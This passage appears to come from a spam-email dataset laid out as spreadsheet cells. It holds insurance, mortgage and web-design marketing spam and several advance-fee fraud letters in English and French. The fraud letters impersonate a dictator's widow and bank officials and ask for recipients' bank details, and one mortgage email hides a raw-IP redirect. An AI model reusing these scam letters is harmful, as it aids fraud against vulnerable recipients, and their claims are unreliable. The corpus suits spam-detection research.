    <t>This is a multi-part message in MIME format. ------=_NextPart_000_571220_01C20CB0.79D206A0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Want 120-250 leads per month?  Co-op dollars available for qualified producers!	  	 We have the turnkey package on seminar selling!	 ?	  Affluent Senior Lead Program 	 ?	  FREEMulti-Media Annuity Selling System CD 	 ?	  FREEStep-By-Step Seminar Presentation 	 ?	  Exclusive Prospect/Client  Marketing and Re-Marketing  System 	  Invest in your business with a guaranteed return on your investment!	 *Must be contracted through PPMG with our top Annuity companies.  	 PLUS a Very Special Offer From PPMG: 	  	 Trip includes Deluxe Outside Cabin for Producer and Guest and Airfare from the nearest home city gateway!** ** As determined by PPMG Travel Coordinator. 	 Ports of Call:	   	  800-330-1997 ext. 292	 ? or ? Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	    	 We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_571220_01C20CB0.79D206A0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Free Step-By-Step Seminar Presentation =20     =20        =20            =20           =20              =20                  =20                 =20                    =20                       •  Affluent Senior Lead Program =20                       • Multi-Media = Annuity Selling System CD =20                       • Step-By-Step = Seminar Presentation =20                       •  Exclusive Prospect/Client                          Marketing and Re-Marketing                          System  =20            =20           *Must be contracted through PPMG with our top Annuity = companies. =20           =20              =20                  =20           =20              =20                 =20                    =20                        PLUS a Very Special Offer From PPMG:  =20            =20           =20              =20                 =20                   =20                   Trip includes Deluxe Outside Cabin for Producer and = Guest=20                   and Airfare from the nearest home city gateway!** =20                   ** As determined by PPMG Travel Coordinator.=20                  =20            Ports of Call: =20            =20            =20            — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                            =20            =20           =20             We = don't want=20               anyone to receive our mailings who does not wish to = receive them.=20               This is a professional communication sent to insurance = professionals.=20               To be removed from this mailing list, DO NOT REPLY = to this=20               message. Instead, go here: =20               [URL]http://www.insurancemail.net[/URL] Legal Notice=20 ------=_NextPart_000_571220_01C20CB0.79D206A0--</t>
  </si>
  <si>
    <t>http://www.insurancemail.net http://www.insurancemail.net</t>
  </si>
  <si>
    <t>4298</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: "MRS. M. SESE SEKO" &lt;maseko_h3@37.com&gt;\nDate: Wed, 4 Sep 2002 20:20:31 +0100</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 20:20:31 +0100</t>
  </si>
  <si>
    <t>"MRS. M. SESE SEKO" &lt;maseko_h3@37.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] URGENT ASSISTANT NEEDED</t>
  </si>
  <si>
    <t>Dear friend,\n\nI am Mrs. Sese-seko widow of late President Mobutu Sese-seko of Zaire, now known as Democratic Republic of Congo (DRC). I am moved to write you this letter. \n\nThis was in confidence considering my present circumstance and situation. I escaped along with my husband and two of our sons James Kongolo and Nzanga out of Democratic Republic of Congo (DRC) to Abidjan, Coted'ivoire where my family and I settled, while we later moved to settled in Morroco where my husband later died of cancer disease. However, due to this situation we decided to change most of my husband's billions of dollars deposited in Swiss bank and other countries into other forms of money coded for safe purpose because the new head of state of (Dr) Mr Laurent Kabila has made arrangement with the Swiss government and other European countries to freeze all my late husband's treasures deposited in some european countries. \n\nHence, my children and I decided laying low in Africa to study the situation\ntill when things gets better. Like now that president Kabila is dead and the son taking over\n(Joseph Kabila). One of my late husband's chateaux in Southern France was confiscated by the french government, and as such I had to change my identity so that my investment will not be traced and confiscated.I have deposited the sum Eighteen Million United State\nDollars (US$18,000,000,00.) With a security company for safe keeping. What I want you to do is to indicate yourinterest that you can assist us in receiving the money on our behalf, so that I can introduce you to my son (Kongolo) who has the out modalities for the claim\nof the said funds. I want you to assist in investing this money, but I will not want my identity revealed.I will also want to acquire real/landed properties and\nstock in multi-national companies and to engage in other safe and non-speculative investments as adviseby your good self. May I at this point emphasize the high level of\nconfidentiality, which this upcoming project demands,and hope you will not betray the trust and\nconfidence, which I repose in you.In conclusion, if you want to assist us, my son (Kongolo) shall divulgeto you all briefs regarding this project, tell you where\nthe funds are currently being maintained and also discuss remuneration for your services.For this reason kindly furnish us your contact information,that is your personal telephone and fax number for validation purpose and acknowledge receipt of this mail using the above email address.\n\nYours sincerely,\n\nMrs. Mariam M. Seseseko.\n\n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>4294</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ " &lt;nlv@insiq.us&gt;\nDate: Wed, 4 Sep 2002 19:28:18 -0400</t>
  </si>
  <si>
    <t>Wed, 4 Sep 2002 19:28:18 -0400</t>
  </si>
  <si>
    <t>"IQ " &lt;nlv@insiq.us&gt;</t>
  </si>
  <si>
    <t>&lt;zzzz@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Outstanding Opportunities for "Premier Producers"</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_20F213_01C25430.B7EDE5E0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Outstanding  Opportunities  For Premier Producers	  Our Client's Search Includes:	  Full-Time Agents 	 Sales Managers	  General Agents	   CPA "Partners"	  Independent Agents &amp; Brokers	   	 Allow  their "Nationally Acclaimed" marketing intiatives and unbeatable product portfolio to DOUBLE YOUR INCOME within 24 months	 PLUS ACCESS TO 385 OTHER COMPANIES 	 For A Confidential Phone Interview Please Complete Form &amp; Submit 	 Name: 	 	 E-mail: 	 	 Phone: 	 	 City:	  	State:	  	 	  Area of Interest:	  	Full-Time Agent	  	Sales Manager General Agent	   	  	CPA "Partner"	  	Independent Agent	   	    	 	   We don't want anybody to receive or mailing who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] Legal Notice   ------=_NextPart_000_20F213_01C25430.B7EDE5E0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Outstanding Opportunities for "Premier Producers" =20              =20               =20             =20                  =20                     Full-Time Agents  Sales Managers General Agents =20                     CPA "Partners" Independent Agents &amp; Brokers   =20              PLUS ACCESS TO 385 OTHER COMPANIES =20             =20                =20                   =20                      =20                          =20                              =20                                                                    For A Confidential Phone Interview = Please Complete Form &amp; Submit =20                                 =20                                   Name: =20                                    =20                                 =20                                   E-mail: =20                                    =20                                 =20                                   Phone: =20                                    =20                                 City: =20                                    State: =20                                      =20                                 Area = of Interest: =20                                    Full-Time = Agent =20                                    Sales = Manager =20                                    General Agent =20                                    CPA = "Partner" =20                                     Independent Agent =20                                   =20                                    =20                   =20                     We=20                       don't want anybody to receive or mailing who does = not wish=20                       to receive them. This is professional = communication sent=20                       to insurance professionals. To be removed from = this mailing=20                       list, DO NOT REPLY to this message. Instead, go = here: [URL]http://www.InsuranceIQ.com[/URL] out Legal = Notice ------=_NextPart_000_20F213_01C25430.B7EDE5E0--</t>
  </si>
  <si>
    <t>http://www.InsuranceIQ.com http://www.InsuranceIQ.com</t>
  </si>
  <si>
    <t>5637</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - National Financial Group" &lt;nfg@insurancemail.net&gt;\nDate: Wed, 31 Jul 2002 19:04:21 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 19:04:21 -0400</t>
  </si>
  <si>
    <t>"IQ - National Financial Group" &lt;nfg@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>An Innovative Plan for Today's Market</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_18E22D_01C238B0.6EDF1B30 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  First Year Bonus - 10% Commissions!  Guaranteed Return of Premium=09  	 Convert Tax Deferred to Tax Free Benefits=0A= Access to death benefit for LTC benefits=0A= 72 Hour Approval (in most cases)=0A= Free E&amp;O Coverage=09 =20  An Innovative Plan Designed for Today's Market=09   _____ =20 Give your clients what they want and need: Guaranteed Death Benefits and Long Term Care Benefits without expensive AND continuous Long Term Care Premiums. =20  ? Lifetime Guarantees ? Return of Premium Guarantees for single pay plans ? Convert Tax Deferred to Tax Free Benefits (for your clients' heirs). Simplified Underwriting - Non-medical, no blood, no urine, no ekg. Have your clients complete a 6 question application, fax to underwriting and generally within 72 hours you will have status.   _____ =20 Call or e-mail   us Today!  800-833-7427 ? or ? Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 National Financial Group =20 The Future Series Convention March 2003. Join us in Maui during PRIME SEASON - An experience you will never forget! *Up to $500,000 maximum; $25,000 must remain in policy after this benefit is exercised. **10% commission on single pay plan ages 45 - 80. ***Single Pay Plans Only. Product and certain features not available in all states. The Future Protector Series (policy form ISWL-1, ISWL-5, ISWL-7, ISWL-21,ISWL-25, ISWL-210) is underwritten by Monumental Life Insurance Company. Rider costs and features vary according to state. FOR BROKER USE ONLY. Not approved for use with the general public as advertisement for purchase of annuity or insurance coverage. 0602ANFG21=20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL] =20 Legal Notice  =20 ------=_NextPart_000_18E22D_01C238B0.6EDF1B30 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable An Innovative Plan for Today's Market =20     =20        =20            =20           =20              =20                  =20            =20            =20           =20              Give your clients what they want and need: Guaranteed = Death Benefits=20             and Long Term Care Benefits without expensive AND continuous = Long=20             Term Care Premiums.               =20             • Lifetime = Guarantees             • Return of Premium Guarantees for single pay = plans             • Convert Tax Deferred to Tax Free = Benefits (for your clients' = heirs). Simplified Underwriting - Non-medical, no blood, no = urine,=20             no ekg. Have your clients complete a 6 question application, = fax to=20             underwriting and generally within 72 hours you will have = status. =20              =20                        Call or e-mail us = Today!             — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                            =20              The Future Series = Convention March 2003.               Join us in Maui during PRIME SEASON - An experience you = will never forget! *Up to $500,000=20               maximum; $25,000 must remain in policy after this benefit = is exercised.=20               **10% commission on single pay plan ages 45 - 80. = ***Single Pay=20               Plans Only. Product and certain features not available in = all states.=20               The Future Protector Series (policy form ISWL-1, ISWL-5, = ISWL-7,=20               ISWL-21,ISWL-25, ISWL-210) is underwritten by Monumental = Life Insurance=20               Company. Rider costs and features vary according to state. = FOR BROKER=20               USE ONLY. Not approved for use with the general public as = advertisement=20               for purchase of annuity or insurance coverage. 0602ANFG21 =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18E22D_01C238B0.6EDF1B30--</t>
  </si>
  <si>
    <t>5633</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Com-Pro Systems, Inc." &lt;emarketing@comprosys.com&gt;\nDate: Wed, 31 Jul 2002 17:42:41 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:42:41 -0400</t>
  </si>
  <si>
    <t>"Com-Pro Systems, Inc." &lt;emarketing@comprosys.com&gt;</t>
  </si>
  <si>
    <t>Get Your Own Great-Looking Website</t>
  </si>
  <si>
    <t>This is a multipart MIME message. --= Multipart Boundary 0731021742 Content-Type: text/plain; 	charset="ISO-8859-1" Content-Transfer-Encoding: 8bit - NEED A PROFESSIONAL LOOKING  WEBSITE? Custom Website Development We can create new web pages or give your existing pages a "face-lift" to bring them up to the Internet's latest trends and standards.  We are experienced at writing HTML and can provide custom programming in CGI, JavaScripts, Java Server Pages, Active Server Pages and ActiveX, which we can use to give your site the dynamics and interactivity of a cutting edge web presence. E-Mail and Web Hosting &gt;Unlimited technical customer support via e-mail &gt;Web hosting- 50MB storage &gt;10 e-mail accounts &gt;Unlimited e-mail forwards For $29.95 monthly. First month Free with purchase of new website!!   &gt;&gt;From server setup to content development, we offer the complete Web solution, which is further enhanced by the services of our carefully chosen strategic partners who provide everything from development tools to hosting services. If you prefer not to receive future news and information on our technology solutions, please reply to this message with UNSUBSCRIBE in the subject. 2200 N.W. 102nd Ave. Suite 4  Miami, FL 33172 Tel: +1 (305) 594-3474   Fax: +1 (305) 594-9655 Toll Free: 1-888-8-COM-PRO Web: [URL]www.comprosys.com[/URL] e-mail: info@comprosys.com Web Templates Starting from just $499!  $399 If your order is placed by 8/15/2002. Our Web templates give you the way to get on the Internet with a very professional look and feel while keeping the costs down. Contact us for your options. How does it work? Easy as 1-2-3... 1) Register on our site and select a username and password, this will allow you to track your website development project start to finish. 2) Fill out the questionnaire, this will help you to get all the materials needed for us to develop your site. It is very important to fill out all the questions. 3) We will then setup your website according to the information given to us. That's it ! If you would prefer a custom solution we will be happy to create a completely custom solution for you. Contact us for a free quote.    Sell Your Products On-Line E-shop is a multi-platform e-commerce solution for Retailers, Wholesalers, or any company wanting to sell on the Internet.  This e-commerce solution can be used as a business-to-business consumer solution.  E-Shop will support any number of products since its data is stored in SQL tables. Corporate Profile Com-Pro Systems, Inc., founded in 1990, is a successful information technology consulting firm providing products and services across several industries.  Com-Pro Systems' goal is to become the leader in software development.  CSI will deliver the entire solution.  By leveraging our relationships with companies like IBM, Microsoft, Compaq, AT&amp;T, Cisco and others we bring you the best cross platform solutions to your Hardware, Software and Hosting needs.      Copyright C 2001, Com-Pro Systems, Inc. (All rights reserved) --= Multipart Boundary 0731021742 Content-Type: text/html; 	charset="ISO-8859-1" Content-Transfer-Encoding: 8bit - NEED A PROFESSIONAL              LOOKING  WEBSITE? Custom Website                    Development We can create new web pages or                    give your existing pages a "face-lift" to bring them up to the                    Internet's latest trends and standards.  We are                    experienced at writing HTML and can provide custom programming                    in CGI, JavaScripts, Java Server Pages, Active Server Pages                    and ActiveX, which we can use to give your site the dynamics                    and interactivity of a cutting edge web presence. E-Mail and Web                    Hosting &gt; Unlimited                          technical customer support via e-mail &gt; Web hosting-                          50MB storage &gt; 10 e-mail                          accounts &gt; Unlimited                          e-mail forwards For $29.95 monthly. First month Free                          with purchase of new                    website!!   From server                          setup to content development, we offer the complete Web                          solution, which is further enhanced by the services of                          our carefully chosen strategic partners who provide                          everything from development tools to hosting                          services. If                      you prefer not to receive future news and information on our                      technology solutions, please reply to this message with UNSUBSCRIBE                      in the subject.2200 N.W. 102nd Ave. Suite 4 Miami, FL                      33172Tel: +1 (305) 594-3474  Fax: +1 (305)                      594-9655Toll Free: 1-888-8-COM-PROWeb: [URL]www.comprosys.come[/URL] info@comprosys.com Web TemplatesStarting from just                    $499! $399 If your                    order is placed by 8/15/2002.Our Web templates give you the way to                    get on the Internet with a very professional look and feel                    while keeping the costs down. Contact us for your                    options.How does it work? Easy as 1-2-3...1)                    Register on our site and select a username and password, this                    will allow you to track your website development project start                    to finish.2) Fill out the questionnaire, this will help                    you to get all the materials needed for us to develop your                    site. It is very important to fill out all the                    questions.3) We will then setup your website according to                    the information given to us. That's it !If you would prefer a custom                    solution we will be happy to create a completely custom                    solution for you. Contact us for a free quote.                     Sell                    Your Products On-Line E-shop is a                          multi-platform e-commerce solution for Retailers,                          Wholesalers, or any company wanting to sell on the                          Internet.  This e-commerce solution can be used as                          a business-to-business consumer solution.  E-Shop                          will support any number of products since its data is                          stored in SQL tables. Corporate              ProfileCom-Pro              Systems, Inc., founded in 1990, is a successful information              technology consulting firm providing products and services across              several industries.  Com-Pro Systems' goal is to become the              leader in software development. CSI will deliver the              entire solution.  By leveraging our relationships with              companies like IBM, Microsoft, Compaq, AT&amp;T, Cisco and others we              bring you the best cross platform solutions to your Hardware,              Software and Hosting needs.                   Copyright C 2001, Com-Pro Systems, Inc. (All rights              reserved) --= Multipart Boundary 0731021742-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>www.comprosys.com www.comprosys.come http://xent.com</t>
  </si>
  <si>
    <t>5632</t>
  </si>
  <si>
    <t>To: purdsnzplm@saverighthere.com\nFrom: bestrate@igo1.saverighthere.com\nDate: Wed, 31 Jul 2002 17:27:49 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 17:27:49 -0400</t>
  </si>
  <si>
    <t>bestrate@igo1.saverighthere.com</t>
  </si>
  <si>
    <t>purdsnzplm@saverighthere.com</t>
  </si>
  <si>
    <t>ADV: Interest rates slashed! Don't wait!                                                   gxlqg</t>
  </si>
  <si>
    <t>INTEREST RATES HAVE JUST BEEN CUT!!!\n \nNOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. \n[URL]http://www3.all-savings.com[/URL]\n       \nEasy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!\n      \n      \n      \n     \n      \n    \n---------------------------------------\nTo unsubscribe, go to: \n[URL]http://www3.all-savings.com[/URL]\nPlease allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://www3.all-savings.com http://www3.all-savings.com</t>
  </si>
  <si>
    <t>5630</t>
  </si>
  <si>
    <t>To: mid2@yahoo.com\nFrom: &lt;gtt45@planetinternet.be&gt;\nDate: Wed, 31 Jul 2002 16:05:58 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:05:58 -0400 (EDT)</t>
  </si>
  <si>
    <t>&lt;gtt45@planetinternet.be&gt;</t>
  </si>
  <si>
    <t>mid2@yahoo.com</t>
  </si>
  <si>
    <t>WORK FROM HOME. FREE DETAILS.</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lotsonet.com[/URL]\n\nand fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.\nNO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO\nONLY.\n\n[URL]http://www.lotsonet.com[/URL]\n\nYou want to be independent?  THEN MAKE IT HAPPEN!\nHAPPEN!\n\nSIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!\nGUARANTEED!\n\n[URL]http://www.lotsonet.com[/URL]\n\n\nTo be removed from our link simple go to:\n\n[URL]http://www.lotsonet.com[/URL]\n\n\n7773yeFu0-048lhUU4192RRTa7-528LHHZ5390OFtY1-426ZJrY6257XgnL8-712daCw9024eVzQ8-819Sl77</t>
  </si>
  <si>
    <t>http://www.lotsonet.com http://www.lotsonet.com http://www.lotsonet.com http://www.lotsonet.com</t>
  </si>
  <si>
    <t>5628</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: balletscho@netcity.ru ()\nDate: Wed, 31 Jul 2002 07:06:01 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 07:06:01 -0400 (EDT)</t>
  </si>
  <si>
    <t>balletscho@netcity.ru ()</t>
  </si>
  <si>
    <t>Copy DVD's to regular CD-R discs and watch on your DVD Player.x1m5l2i4</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by\n (balletscho@netcity.ru) on Wednesday, July 31, 2002 at 07:06:01\n---------------------------------------------------------------------------\n\n: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: [URL]http://006@www.dvdcopyxp.com[/URL] Click to remove [URL]http://007@www.spambites.com[/URL] \n\n---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://006@www.dvdcopyxp.com http://007@www.spambites.com</t>
  </si>
  <si>
    <t>5624</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: renturrell22@netscape.net\nDate: Wed, 31 Jul 2002 00:21:04 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 00:21:04 -0400</t>
  </si>
  <si>
    <t>renturrell22@netscape.net</t>
  </si>
  <si>
    <t>Get the lowest possible interest rate for you--GUARANTEED.</t>
  </si>
  <si>
    <t>Opportunity is knocking. Why? Because mortgage rates are rising. As a National Lender, not a broker, we can guarantee you the lowest possible rate on your home loan. Rates may well never be this low again. This is your chance to secure a better future. You could literally save enough money to buy that new car you've been wanting or to take that special vacation. Why pay more than you have to pay? We can guarantee you the best rate and the best deal possible for you. But only if you act now. This is a free service. No fees of any kind.   You can easily determine if we can help you in just a few short minutes. We only provide information in terms so simple that anyone can understand them. We promise that you won't need an attorney to see the savings.   We offer both first and second home loans and we will be happy to show you why your current loan is the best for you. 0r why you should replace it. Once again, there's no risk for you. None at all. Take two minutes and use the link(s) below that works for you. Let us show you how to get more for yourself and your family. Don't let opportunity pass you by. Take action now. Click_Here [URL]http://mamma.com[/URL]ŋ=Lycos&amp;cb=WebZone&amp;dest=[URL]http://211.167.74.101[/URL]   Sincerely, Chalres M. Gillette MortCorp, LLC lnqqbopolnujfmigjbfcittazhnnfxnmysspcmokdljxprdecawunewuumvjtpfnsbqwknqfkybbuvvnikbxcsnxdodgistybllysriqulpzvspiqkcbpjxvh __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! [URL]http://shopnow.netscape.com[/URL] Get your own FREE, personal Netscape Mail account today at [URL]http://webmail.netscape.com[/URL]</t>
  </si>
  <si>
    <t>http://mamma.com http://211.167.74.101 http://shopnow.netscape.com http://webmail.netscape.com</t>
  </si>
  <si>
    <t>2896</t>
  </si>
  <si>
    <t>To: nan\nFrom: Oumarou Trikouni &lt;ouma_rou_trik_28@hotmail.com&gt;\nDate: Wed, 31 Jan 2007 17:03:45 +0000</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2007 17:03:45 +0000</t>
  </si>
  <si>
    <t>Oumarou Trikouni &lt;ouma_rou_trik_28@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Mr OUMAROU TRIKOUNI, VEUILLEZ LIRE TRES ATTENTIVEMENT CE MESSAGE</t>
  </si>
  <si>
    <t>JE SUIS MONSIEUR OUMAROU TRIKOUNI ,\nDIRECTEUR CHARGE DES FACTURES ET ECHANGES EXTERIEURS DE LA B.O.A ( BANK OF \nAFRICA).BURKINA FASO,MARIE PERE DE TROIS ENFANTS,AGE 56 ANS\n\nDans mon departement, j'ai decouvert une somme abandonne d'une valeur de \n16.500 000 $  US (SEIZE MILLIONS CINQ CENT MILLES DOLLARS USA) dans un \ncompte appartenant  un de nos clients trangers qui a eu la mort avec toute \nsa famille dans un crash d'avion en 2003.\n\nDepuis que nous  avions obtenus les informations sur  sa mort, nous nous \nattendions  ce que ses proches parents ou sa proche relation viennent \nrclamer largent. Malheureusement jusquaujourdhui aucune manifestation. \nDans ses cas figurent,en conformit avec les lois et reglements interieurs \ndes operations bancaires de la boite,stipulent que,si une telle somme \nrestait,sans aucune manifestation quelconque d'un proche,six annes \naprs,ladite somme est transfere dans le tresor de la banque,comme etant un \nfond non reclam.\n\nSuite  cette dcouverte j'ai dcid de vous faire  cette proposition \nd'affaire, afin de pouvoir librer l'argent.Dautant Puisque personne ne \nvient la rclamer , je propose que vous vous dclarer   la banque comme \netant un parent ou une proche relation de la famille defunte.\nSi nous tombons daccord,45% de la somme sera  vous,les 5% servirons aux \nfrais occasionnant les operations du transfert,et les 50% serons  moi.\n\nPar consquent, pour permettre le  transfert immdiat de ces fonds,il vous \nfaut ouvrir  votre nom, un compte bancaire si vous n'a n'aviez pas,ensiute \nvous devez adresser une lettre  la banque comme etan un proche parent de la \nfamille dfunte comme suit:\n\n- le nom de votre banque,\n- votre numro de compte bancaire,\n- votre numro de fax et de tlphone priv\n\nNB: Pour le numero de compte meme si votre compte est vide ce ne pas grave \npourvu que a soit un compte  activ\n\n\n la rception de votre rponse, je vous enverrai  par fax ou par mail le \nformulaire de la lettre d'application que vous allez remplir et envoyer  \nl'adresse de la banque.\nJe porte   votre connaissance que  cette transaction ne comporte aucun \nrisque car toutes les dispositions seront prises,dautant puisque moi-meme je \nsuis un membre influent de la banque.\nAu cas o vous aurez besoin d'informations concernant ma \nproposition,n'hesitez pas, je serai  votre entire disposition jusqu' la \nfin de l'operation.\nSi j'ai un conseil  vous donner,c'est d'etre tres discret,car seule dans la \ndiscretion que nous pourrions reussir.\nVous voyez ces sommes n'ont jamais et utilises comme il se doit.Les \npremiers responsables les acheminent  d'autres fins.\nDans lattende de votre prompte raction, je vous prie cher \nmonsieur,l'expression de ma trs haute considration\n\nDr OUMAROU TRIKOUNI\n\nEmail : ouma_rou_trik@yahoo.frl\n\n\nTel: 00226 76 63 87 30\n\n_________________________________________________________________\nMSN Messenger : appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.msn.fr</t>
  </si>
  <si>
    <t>2894</t>
  </si>
  <si>
    <t>To: nan\nFrom: sam ibrahim5 &lt;samibrahim5@hotmail.fr&gt;\nDate: Wed, 31 Jan 2007 13:09:15 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2007 13:09:15 +0100</t>
  </si>
  <si>
    <t>sam ibrahim5 &lt;samibrahim5@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">URGENT RESPONSE NEEDED </t>
  </si>
  <si>
    <t>DEAR FRIEND,\n\nI MAKE THIS APPEAL WITH THE UNDERSTANDING THAT ANY FACTS OR OPINION\nEXPRESSED BY ME ARE GIVING IN CONAFIDENCE AND SOLELY FOR YOUR\nPERSONAL NFORMATION AND USE.\n\nI AM  DR. SAMI IBRAHIM ,THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN\nREMITTANCE DEPARTMENT OF MY BANK.\n\nBEFORE I WROTE YOU, I  PRAYED THAT YOU WILL BE A HONEST AND RELIABLE\nPERSON WHOM I CAN WORK WITH TO ACHIEVE THIS DEAL OF OUR LIFE.FROM MY\nSECTION\nIN THE BANK,\n\nI DISCOVERED AN ABANDONED SUM OF SIX MILLION EIGHT HUNDRED THOUSAND\nUNITED\nSTATES DOLLARS ($6.8M) WITH ACCOUNT NUMBER 14-2558-5976 THAT BELONGS TO\nONE\nOF OUR FOREIGN CUSTOMERS WHO DIED ALONG WITH HIS WIFE AND ONLY DAUGHTER\nIN A\nPLANE CRASH OF ALASKA AIRLINES FLIGHT NUMBER 261 WHICH CRASHED ON\nMONDAY, 31\nJULY, 2000, 13:22 GMT 14:22 UK. WITH THE WHOLE PASSENGERS ABOARD.\n\n\nTHE NAME OF THE DECEASED MAN WAS (MR. ANDREAS SCHRANNER FROM\nMUNICH,GERMANY). N.B.YOU SHALL READ MORE ABOUT THE CRASH ON VISITING\nTHIS (WEBSITE) BEFORE YOU START WITH ME. BELOW IS THE WEBSITE.\n\nHTTP://NEWS.BBC.CO.UK/1/HI/WORLD/EUROPE/859479.STM\n\nIT IS THEREFORE UPON THIS DISCOVERY THAT I NOW DECIDED TO MAKE THIS\nBUSINESS PROPOSAL TO YOU AND FOR OUR BANK TO RELEASE THE MONEY TO\nYOU. YOU HAVE TO FOLLOW THE INSTRUCTION WHICH I WILL BE SEND TO YOU AS\nTHE\nNEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT\nDISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY\nTO GO\nINTO OUR BANK TREASURY AS UNCLAIMED BILL.\n\n\nTHE BANKING LAW AND GUIDELINES HERE STIPULATES THAT IF SUCH MONEY\nREMAINED UNCLAIMED AFTER SIX YEARS, THE MONEY WILL BE TRANSFERED INTO\nTHE\nBANK TREASURY AS UNCLAIMED FUND. THE MONEY HAS NOW STAYED MORE THAN SIX\nYEARS AND I AM PREPARING DOCUMENTAION TO PROVE THAT THIS MONEY HAS BEEN\nTRANSFERED TO OUR BANK TREASURY. IT WILL BE BETWEEN ME AND YOU ONLY\nTHAT\nWILL KNOW THAT THE MONEY IS NOT TRANSFERED INTO OUR TREASURE.\n\n\nTHIS REQUEST OF FOREIGNER AS NEXT OF KIN IN THIS TRANSACTION IS\nOCCASIONED BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A\nBURKINAB\nCANNOT STAND AS NEXT OF KIN TO A FOREIGNER.IN APPRECIATION OF YOUR\nASSISTANCE, I AM OFFERING YOU 35% OF THE TOTAL SUM. 5% FOR\nCONTINGENCIES\n(COST OF TRANSFER/OTHER CHARGES) LIKELY TO BE INCURRED DURING THE\nCOURSE OF\nTRANSACTION, WHILE THE REMAINING 60% IS FOR ME.UPON RECEIPT OF YOUR\nREPLY.I\nWILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF THE APPLICATION WHICH YOU\nWILL\nCOMPLETE AND FORWARD TO OUR BANK ASKING FOR THIS MONEY TO BE PAID TO\nYOU AS\nTHE NEXT OF KIN TO MR;ANDREAS SCHRANNER.\n\n\nPLEASE I WOULD LIKE YOU TO KNOW THE FOLLOWING INFORMATIONS.(1.) THIS\nBUSINESS IS HUNDRED PERCENT FREE FROM RISK.(2.)YOU WILL NOT FACE ANY\nMUCH QUESTIONS BECAUSE THE APPLICATION WILL BEAR THE BRIEF\nINFORMATION OF THE DECEASED WHICH THE BANK MAY LIKE TO KNOW.(3.) IF YOU\nWILL\nFOLLOW MY NSTRUCTIONS AND DIRECTIVES,THIS TRANSACTION WILL BE COMPLETED\nWITHIN A SHORT PERIOD OF TIME.(4.)YOU SHOULD KEEP THIS 